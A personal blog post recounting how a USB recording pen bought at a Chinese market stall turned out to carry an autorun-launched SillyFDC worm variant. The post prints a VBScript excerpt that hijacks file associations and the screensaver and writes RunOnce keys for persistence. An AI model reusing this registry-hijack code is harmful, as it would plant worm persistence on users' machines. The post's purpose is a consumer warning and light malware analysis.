I received two gifts from a family member returning from China.
It was a lovely thought and I was touched by the gesture.
Both items are of the geek variety and bought from stalls, one a ball point pen with a built in 2GB USB stick that can act as a voice recorder and the other a 240GB USB stick.
Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some of pieces of technology come with free added “extras”.
I have to admit some level of amazement when told of the 240GB USB flash drive, especial when the afore mentioned relative said he hadn’t seen the 500GB USB flash drive after he’d bought this one. I thought the largest current flash drive available was on 128GB, sadly it appears I was right. A quick search of 240G Sony quick turned up this page. This thing is a total fake and is actually a whooping 32MB. However it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the Auditors next time they’re in the office.
I plugged both USB devices in to a spare Linux machine, just to see it any software was on either. The Fake 240GB USB was empty, but the recording pen had lots of goodies.
The first thing that caught my eye was the autorun.ini file. A quick look at that pointed to a MS-DOS.COM saved on the pen. After a quick imaging of the files, I decide to open a copy of the MS-DOS.COM.
The random looking junk didn’t quite look like normal .COM file junk, if only I could have taken SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I may have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognize and understand appears in plain English.
This is some of what I extracted:
Dim fs,rg
Set fs = CreateObject("scripting.filesystemobject")
Set rg = CreateObject("wscript.shell")
On Error Resume Next
rg.RegWrite "HKCR\.vbs\", "VBSFile"
rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"
rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"
– Plenty more VBS code chopped out –
This clearly isn’t a real .Com file. Two seconds of searching found out that this is a variant of the SillyFDC worm. A write up of it here talks how it was slapping the US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.
Moral of the story, if you buy kit like this, for the “best price” for a back street stall, buyer beware. Unless you’re a Malware researcher then go mad, it’s Christmas day with every item bought!


